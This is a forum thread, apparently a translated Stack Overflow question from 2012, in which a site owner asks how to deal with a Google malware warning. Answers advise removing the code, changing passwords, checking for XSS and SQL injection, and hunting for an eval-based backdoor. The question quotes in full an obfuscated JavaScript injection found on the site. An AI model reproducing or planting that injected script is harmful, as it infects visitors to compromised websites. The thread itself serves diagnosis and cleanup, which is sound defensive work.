0

昨天,当我来到我的一个网站时,我收到了来自谷歌的警告,说我的网站上有恶意软件。我查看了代码,确实有一些不应该存在的 javascript。我用谷歌搜索并没有发现任何有用的东西。当我回到我的网站时,该代码已经消失,但谷歌(从搜索引擎访问该网站时)和谷歌浏览器仍然给我一个警告,指出我的网站上有恶意软件。

我查看了网站管理员工具,他们发现很少有页面存在问题。其中之一是http://www.keramikfliesen.com/schweiz/rimini/。恶意软件下的网站管理员工具中列出的代码是:

<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?
^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!
^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@
$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+
&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]
&+&~

你能帮帮我吗?我该如何对抗这个?

非常感谢大家提前提供的帮助!

4

3 回答 3

2


  • 从您的网页中删除恶意软件。
  • 立即更改您的密码。
  • 还要检查任何XSS(跨站点脚本)和SQL 注入漏洞。
  • 停用排名不高或来自知名来源的插件。
  • 使用安全协议。查看 StopBadware.org 的网站清洁和保护技巧
  • 密切关注您的日志文件。
  • 及时了解最新的软件更新和补丁。

    希望能帮助到你!
于 2012-05-30T07:37:41.297 回答
1

如果代码再次出现,则攻击者留下了一些脚本,该脚本应请求运行感染程序。通常这个脚本会接收到恶意代码的编码字符串(例如 in base64),对其进行解码并通过eval(). 您应该找到这个文件(它很可能是一个 PHP 脚本)并将其删除。要找到它,请查看日志并搜索可疑请求(例如,单个POST请求,传输base64字符串是非常可疑的请求)。

于 2012-07-27T14:17:38.853 回答
0

很可能您的主机已被自动化工具入侵(密码被盗)。该工具通常会在 js 文件中注入一些 javascript,以便用恶意软件感染访问您页面的人。你应该 :

  1. 更改您的密码。
  2. 恢复最新的受损备份。
于 2012-05-30T07:37:02.740 回答